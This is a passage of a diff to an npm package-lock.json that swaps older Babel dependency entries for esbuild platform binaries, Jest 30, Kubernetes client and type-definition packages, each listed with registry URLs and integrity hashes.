"@babel/helper-validator-identifier": "^7.14.9", - "@babel/template": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-optimise-call-expression": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/helper-optimise-call-expression/-/helper-optimise-call-expression-7.14.5.tgz", - "integrity": "sha512-IqiLIrODUOdnPU9/F8ib1Fx2ohlgDhxnIDU7OEVi+kAbEZcyiF7BLU8W6PfvPi9LzztjS7kcbzbmL7oG8kD6VA==", + "node_modules/@esbuild/linux-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.25.6.tgz", + "integrity": "sha512-A6bJB41b4lKFWRKNrWoP2LHsjVzNiaurf7wyj/XtFNTsnPuxwEBWHLty+ZE0dWBKuSK1fvKgrKaNjBS7qbFKig==", + "cpu": [ + "x64" + ], "dev": true, - "dependencies": { - "@babel/types": "^7.14.5" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.20.2", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.20.2.tgz", - "integrity": "sha512-8RvlJG2mj4huQ4pZ+rU9lqKi9ZKiRmuvGuM2HlWmkmgOhbs6zEAw6IEiJ5cQqGbDzGZOhwuOQNtZMi/ENLjZoQ==", + "node_modules/@esbuild/netbsd-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-arm64/-/netbsd-arm64-0.25.6.tgz", + "integrity": "sha512-IjA+DcwoVpjEvyxZddDqBY+uJ2Snc6duLpjmkXm/v4xuS3H+3FkLZlDm9ZsAbF9rsfP3zeA0/ArNDORZgrxR/Q==", + "cpu": [ + "arm64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-replace-supers": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/helper-replace-supers/-/helper-replace-supers-7.15.0.tgz", - "integrity": "sha512-6O+eWrhx+HEra/uJnifCwhwMd6Bp5+ZfZeJwbqUTuqkhIT6YcRhiZCOOFChRypOIe0cV46kFrRBlm+t5vHCEaA==", + "node_modules/@esbuild/netbsd-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.25.6.tgz", + "integrity": "sha512-dUXuZr5WenIDlMHdMkvDc1FAu4xdWixTCRgP7RQLBOkkGgwuuzaGSYcOpW4jFxzpzL1ejb8yF620UxAqnBrR9g==", + "cpu": [ + "x64" + ], "dev": true, - "dependencies": { - "@babel/helper-member-expression-to-functions": "^7.15.0", - "@babel/helper-optimise-call-expression": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-simple-access": { - "version": "7.14.8", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.14.8.tgz", - "integrity": "sha512-TrFN4RHh9gnWEU+s7JloIho2T76GPwRHhdzOWLqTrMnlas8T9O7ec+oEDNsRXndOmru9ymH9DFrEOxpzPoSbdg==", + "node_modules/@esbuild/openbsd-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-arm64/-/openbsd-arm64-0.25.6.tgz", + "integrity": "sha512-l8ZCvXP0tbTJ3iaqdNf3pjaOSd5ex/e6/omLIQCVBLmHTlfXW3zAxQ4fnDmPLOB1x9xrcSi/xtCWFwCZRIaEwg==", + "cpu": [ + "arm64" + ], "dev": true, - "dependencies": { - "@babel/types": "^7.14.8" - }, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", + "node_modules/@esbuild/openbsd-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.25.6.tgz", + "integrity": "sha512-hKrmDa0aOFOr71KQ/19JC7az1P0GWtCN1t2ahYAf4O007DHZt/dW8ym5+CUdJhQ/qkZmI1HAF8KkJbEFtCL7gw==", + "cpu": [ + "x64" + ], "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", + "node_modules/@esbuild/openharmony-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/openharmony-arm64/-/openharmony-arm64-0.25.6.tgz", + "integrity": "sha512-+SqBcAWoB1fYKmpWoQP4pGtx+pUUC//RNYhFdbcSA16617cchuryuhOCRpPsjCblKukAckWsV+aQ3UKT/RMPcA==", + "cpu": [ + "arm64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openharmony" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", + "node_modules/@esbuild/sunos-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.25.6.tgz", + "integrity": "sha512-dyCGxv1/Br7MiSC42qinGL8KkG4kX0pEsdb0+TKhmJZgCUDBGmyo1/ArCjNGiOLiIAgdbWgmWgib4HoCi5t7kA==", + "cpu": [ + "x64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "sunos" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-validator-option": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.14.5.tgz", - "integrity": "sha512-OX8D5eeX4XwcroVW45NMvoYaIuFI+GQpA2a8Gi+X/U/cDUIRsV37qQfF905F0htTRCREQIB4KqPeaveRJUl3Ow==", + "node_modules/@esbuild/win32-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.25.6.tgz", + "integrity": "sha512-42QOgcZeZOvXfsCBJF5Afw73t4veOId//XD3i+/9gSkhSV6Gk3VPlWncctI+JcOyERv85FUo7RxuxGy+z8A43Q==", + "cpu": [ + "arm64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helpers": { - "version": "7.15.3", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.15.3.tgz", - "integrity": "sha512-HwJiz52XaS96lX+28Tnbu31VeFSQJGOeKHJeaEPQlTl7PnlhFElWPj8tUXtqFIzeN86XxXoBr+WFAyK2PPVz6g==", + "node_modules/@esbuild/win32-ia32": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.25.6.tgz", + "integrity": "sha512-4AWhgXmDuYN7rJI6ORB+uU9DHLq/erBbuMoAuB4VWJTu5KtCgcKYPynF0YI1VkBNuEfjNlLrFr9KZPJzrtLkrQ==", + "cpu": [ + "ia32" + ], "dev": true, - "dependencies": { - "@babel/template": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", + "node_modules/@esbuild/win32-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.25.6.tgz", + "integrity": "sha512-NgJPHHbEpLQgDH2MjQu90pzW/5vvXIZ7KOnPyNBm92A6WgZ/7b6fJyUBjoumLqeOQQGqY2QjQxRo97ah4Sj0cA==", + "cpu": [ + "x64" + ], "dev": true, - "dependencies": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/highlight/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", + "node_modules/@jest/diff-sequences": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/diff-sequences/-/diff-sequences-30.0.1.tgz", + "integrity": "sha512-n5H8QLDJ47QqbCNn5SuFjCRDrOLEZ0h8vAHCK5RL9Ls7Xa8AQLa/YxAc9UjFqoEDM48muwtBGjtMY5cr0PLDCw==", "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, + "license": "MIT", "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/highlight/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "node_modules/@jest/get-type": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/get-type/-/get-type-30.0.1.tgz", + "integrity": "sha512-AyYdemXCptSRFirI5EPazNxyPwAL0jXt3zceFjaj8NFiKP9pOi0bfXonf6qkf82z2t3QWPeLCWWw4stPBzctLw==", "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, + "license": "MIT", "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/highlight/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "node_modules/@jest/pattern": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/pattern/-/pattern-30.0.1.tgz", + "integrity": "sha512-gWp7NfQW27LaBQz3TITS8L7ZCQ0TLvtmI//4OwlQRx4rnWxcPNIYjxZpDcN4+UlGxgm3jS5QPz8IPTCkb59wZA==", "dev": true, + "license": "MIT", "dependencies": { - "color-name": "1.1.3" + "@types/node": "*", + "jest-regex-util": "30.0.1" + }, + "engines": { + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/highlight/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/highlight/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "node_modules/@jsep-plugin/assignment": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", + "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", "dev": true, + "license": "MIT", "engines": { - "node": ">=0.8.0" + "node": ">= 10.16.0" + }, + "peerDependencies": { + "jsep": "^0.4.0||^1.0.0" } }, - "node_modules/@babel/highlight/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "node_modules/@jsep-plugin/regex": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", + "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", "dev": true, + "license": "MIT", "engines": { - "node": ">=4" + "node": ">= 10.16.0" + }, + "peerDependencies": { + "jsep": "^0.4.0||^1.0.0" } }, - "node_modules/@babel/highlight/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "node_modules/@kubernetes/client-node": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", "dev": true, + "license": "Apache-2.0", "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" + "@types/js-yaml": "^4.0.1", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", + "isomorphic-ws": "^5.0.0", + "js-yaml": "^4.1.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", + "openid-client": "^6.1.3", + "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", + "stream-buffers": "^3.0.2", + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, - "node_modules/@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", + "node_modules/@types/istanbul-lib-coverage": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.6.tgz", + "integrity": "sha512-2QF/t/auWm0lsy8XtKVPG19v3sSOQlJe/YHZgfjb/KBBHOGSV+J2q/S671rcq9uTBrLAXmZpqJiaQbMT+zNU1w==", "dev": true, - "bin": { - "parser": "bin/babel-parser.js" - }, - "engines": { - "node": ">=6.0.0" - } + "license": "MIT" }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", + "node_modules/@types/istanbul-lib-report": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", + "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", "dev": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "@types/istanbul-lib-coverage": "*" } }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", + "node_modules/@types/istanbul-reports": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.4.tgz", + "integrity": "sha512-pk2B1NWalF9toCRu6gjBzR69syFjP4Od8WRAX+0mmf9lAjCRicLOWc+ZrxZHx/0XRjotgkF9t6iaMJ+aXcOdZQ==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "@types/istanbul-lib-report": "*" } }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", + "node_modules/@types/jest": { + "version": "30.0.0", + "resolved": "https://registry.npmjs.org/@types/jest/-/jest-30.0.0.tgz", + "integrity": "sha512-XTYugzhuwqWjws0CVz8QpM36+T+Dz5mTEBKhNs/esGLnCIlGdRy+Dq78NRjd7ls7r8BC8ZRMOrKlkO1hU0JOwA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "expect": "^30.0.0", + "pretty-format": "^30.0.0" } }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", + "node_modules/@types/jest/node_modules/@jest/expect-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-30.0.4.tgz", + "integrity": "sha512-EgXecHDNfANeqOkcak0DxsoVI4qkDUsR7n/Lr2vtmTBjwLPBnnPOF71S11Q8IObWzxm2QgQoY6f9hzrRD3gHRA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" + "@jest/get-type": "30.0.1" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", + "node_modules/@types/jest/node_modules/@jest/schemas": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-30.0.1.tgz", + "integrity": "sha512-+g/1TKjFuGrf1Hh0QPCv0gISwBxJ+MQSNXmG9zjHy7BmFhtoJ9fdNhWJp3qUKRi93AOZHXtdxZgJ1vAtz6z65w==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "@sinclair/typebox": "^0.34.0" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.18.6.tgz", - "integrity": "sha512-6mmljtAedFGTWu2p/8WIORGwy+61PLgOMPOdazc7YoJ9ZCWUyFy3A6CpPkRKLKD1ToAesxX8KGEViAiLo9N+7Q==", + "node_modules/@types/jest/node_modules/@jest/types": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/types/-/types-30.0.1.tgz", + "integrity": "sha512-HGwoYRVF0QSKJu1ZQX0o5ZrUrrhj0aOOFA8hXrumD7SIzjouevhawbTjmXdwOmURdGluU9DM/XvGm3NyFoiQjw==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.18.6" + "@jest/pattern": "30.0.1", + "@jest/schemas": "30.0.1", + "@types/istanbul-lib-coverage": "^2.0.6", + "@types/istanbul-reports": "^3.0.4", + "@types/node": "*", + "@types/yargs": "^17.0.33", + "chalk": "^4.1.2" }, "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", + "node_modules/@types/jest/node_modules/@sinclair/typebox": { + "version": "0.34.37", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.34.37.tgz", + "integrity": "sha512-2TRuQVgQYfy+EzHRTIvkhv2ADEouJ2xNS/Vq+W5EuuewBdOrvATvljZTxHWZSTYr2sTjTHpGvucaGAt67S2akw==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" + "license": "MIT" + }, + "node_modules/@types/jest/node_modules/ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=10" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" } }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", + "node_modules/@types/jest/node_modules/ci-info": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-4.3.0.tgz", + "integrity": "sha512-l+2bNRMiQgcfILUi33labAZYIWlH1kWDp+ecNo5iisRKrbm0xcRyCww71/YU0Fkw0mAFpz9bJayXPjey6vkmaQ==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/sibiraj-s" + } + ], + "license": "MIT", + "engines": { + "node": ">=8" } }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", + "node_modules/@types/jest/node_modules/expect": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/expect/-/expect-30.0.4.tgz", + "integrity": "sha512-dDLGjnP2cKbEppxVICxI/Uf4YemmGMPNy0QytCbfafbpYk9AFQsxb8Uyrxii0RPK7FWgLGlSem+07WirwS3cFQ==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" + "@jest/expect-utils": "30.0.4", + "@jest/get-type": "30.0.1", + "jest-matcher-utils": "30.0.4", + "jest-message-util": "30.0.2", + "jest-mock": "30.0.2", + "jest-util": "30.0.2" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", + "node_modules/@types/jest/node_modules/jest-matcher-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-30.0.4.tgz", + "integrity": "sha512-ubCewJ54YzeAZ2JeHHGVoU+eDIpQFsfPQs0xURPWoNiO42LGJ+QGgfSf+hFIRplkZDkhH5MOvuxHKXRTUU3dUQ==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "jest-diff": "30.0.4", + "pretty-format": "30.0.2" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", + "node_modules/@types/jest/node_modules/jest-message-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-30.0.2.tgz", + "integrity": "sha512-vXywcxmr0SsKXF/bAD7t7nMamRvPuJkras00gqYeB1V0WllxZrbZ0paRr3XqpFU2sYYjD0qAaG2fRyn/CGZ0aw==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "@babel/code-frame": "^7.27.1", + "@jest/types": "30.0.1", + "@types/stack-utils": "^2.0.3", + "chalk": "^4.1.2", + "graceful-fs": "^4.2.11", + "micromatch": "^4.0.8", + "pretty-format": "30.0.2", + "slash": "^3.0.0", + "stack-utils": "^2.0.6" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", + "node_modules/@types/jest/node_modules/jest-mock": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-30.0.2.tgz", + "integrity": "sha512-PnZOHmqup/9cT/y+pXIVbbi8ID6U1XHRmbvR7MvUy4SLqhCbwpkmXhLbsWbGewHrV5x/1bF7YDjs+x24/QSvFA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "@jest/types": "30.0.1", + "@types/node": "*", + "jest-util": "30.0.2" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || 